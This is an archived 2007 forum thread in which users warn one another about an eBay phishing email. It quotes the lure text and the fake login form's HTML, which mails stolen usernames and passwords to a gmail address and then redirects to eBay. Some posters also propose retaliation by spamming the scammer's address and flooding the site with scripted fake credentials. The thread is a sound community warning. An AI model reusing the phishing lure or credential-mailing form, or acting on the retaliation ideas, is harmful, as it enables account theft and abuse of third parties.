View Full Version : Check out this scam (ebay)
jfitzem 03-27-2007, 05:07 AM I received the email this morning. Being the clever little scam that it is, I thought I should share it with you:rolleyes:
(Hi there!
I am contacting you regarding the item you have listed on eBay. I am currently the highest bidder on your isting but my main concern is that someone contacted me with the same item pretending is you and told me to buy from him, Let me know if it's your item:
http://search-desc.by.ru/search.ebay.com/ws/eBayISAPI.dll/WQQ_item140097364470/
If you are the seller, let me know how much shipping to 90210, CA and if you are not, this guy is using your identity)
Please note that the hyperlink takes you directly to a false signon (effectively getting your username and password) and the Item # listed is not for anything. I almost jumped into it because the sender brings up the point that someone is using my ID.
Keep your eyes open, trust no one.
RickC5 03-27-2007, 05:15 AM What you received is a slightly different version of the scam discussed below in this thread:
"have you seen this Ebay problem?"
.ru is russian.
http://search-desc.by.ru/?C=N;O=A
I received the email this morning. Being the clever little scam that it is, I thought I should share it with you:rolleyes:
(Hi there!
I am contacting you regarding the item you have listed on eBay. I am currently the highest bidder on your isting but my main concern is that someone contacted me with the same item pretending is you and told me to buy from him, Let me know if it's your item:
http://search-desc.by.ru/search.ebay.com/ws/eBayISAPI.dll/WQQ_item140097364470/
If you are the seller, let me know how much shipping to 90210, CA and if you are not, this guy is using your identity)
Please note that the hyperlink takes you directly to a false signon (effectively getting your username and password) and the Item # listed is not for anything. I almost jumped into it because the sender brings up the point that someone is using my ID.
Keep your eyes open, trust no one.
Looking at the HTML code:
form action="http://webtools.gmti.com/cgi-bin/webforms.pl" method="post"
INPUT TYPE=hidden NAME=mailto VALUE="alinsme@gmail.com"
INPUT TYPE=hidden NAME=mailsubject VALUE="USERE - USERE NOI"
INPUT TYPE=hidden NAME=redirect VALUE="http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=140097364470"
the passwords are being email to alinsme@gmail.com before you are being redirected.
.ru is russian.
http://search-desc.by.ru/?C=N;O=A
that email is also on this page with other emails addresses for testing of something... maybe hacked accounts?
http://www.hscripts.com/scripts/php/HMAD/hmailer.php
Looking at the HTML code:
form action="http://webtools.gmti.com/cgi-bin/webforms.pl" method="post"
INPUT TYPE=hidden NAME=mailto VALUE="alinsme@gmail.com"
INPUT TYPE=hidden NAME=mailsubject VALUE="USERE - USERE NOI"
INPUT TYPE=hidden NAME=redirect VALUE="http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=140097364470"
the passwords are being email to alinsme@gmail.com before you are being redirected.
rogger 03-27-2007, 08:28 AM Mang, the zipcode alone. :mad2:
http://www.wildaboutmovies.com/images_2/BeverlyHills90210Season1DVDBoxSet.jpg
Kestreljr 03-27-2007, 08:48 AM Looking at the HTML code:
form action="http://webtools.gmti.com/cgi-bin/webforms.pl" method="post"
INPUT TYPE=hidden NAME=mailto VALUE="alinsme@gmail.com"
INPUT TYPE=hidden NAME=mailsubject VALUE="USERE - USERE NOI"
INPUT TYPE=hidden NAME=redirect VALUE="http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=140097364470"
the passwords are being email to alinsme@gmail.com before you are being redirected.
Bas- that is awesome. I am no computer dude, but can you somehow get an IP address for him/her too? I saw the preview for Dateline's Identy Theft ring and I want to kick these guy's a$$es.
Mel Erickson 03-27-2007, 08:56 AM Probably a popular show over there in Russia and the only zip code they could think of (plus, if you think like a Russian, who wouldn't trust someone from Beverly Hills?).
Touch0Gray 03-27-2007, 09:37 AM Pinging gmail.com [64.233.161.83]
here is the IP add for gmail.com
If you report this fraud to gmail.com my guess it they never respond or even care.
No, I don't think that is possible sitting outside the box.
google would have the information though.
Bas- that is awesome. I am no computer dude, but can you somehow get an IP address for him/her too? I saw the preview for Dateline's Identy Theft ring and I want to kick these guy's a$$es.
rogger 03-27-2007, 10:50 AM Probably a popular show over there in Russia and the only zip code they could think of (plus, if you think like a Russian, who wouldn't trust someone from Beverly Hills?).
If I thought like a Russian I'd be flipping a coin to determine wheter this moonshine is safe to drink. :rolleyes:
beantownbiker 03-27-2007, 11:44 AM why doesnt someone just take that email address and run it through every single spam site you can think of. this requires going to those questionable sites, but def, spam this guys email address....seems like the right thing to do. Even better post ads on craigslist with his email address, anything where another hacker with google can find it, let him sort through the fake emails.
why doesnt someone just take that email address and run it through every single spam site you can think of. this requires going to those questionable sites, but def, spam this guys email address....seems like the right thing to do. Even better post ads on craigslist with his email address, anything where another hacker with google can find it, let him sort through the fake emails.
or write a script to continue to hit the .ru website with fake combinations from a dictionary.
mikeyp123 03-27-2007, 04:36 PM I think I was hit by a slightly different scam. After winning an auction I was sent an email from an ebay user that they were the actual owner of the bike. They wanted me to contact them via their personal email address, so they could arrange shipping and payment.
The odd thing, it was from what looked to be, a legitimate e-bay user.. with good feedback history. I reported the message to ebay.
Anyone else had this happen to them?
de.abeja 03-27-2007, 04:49 PM All the time. I try my best to communicate all auction information via telephone by putting a number in the invoice so I know who has it.
mikeyp123 03-27-2007, 06:22 PM All this ebay stuff really leaves a bad taste in my mouth. For some reason it seems more prevalant with high-end bicycles. I've done my share of auctions of other expensive toys, and never had so many problems.
|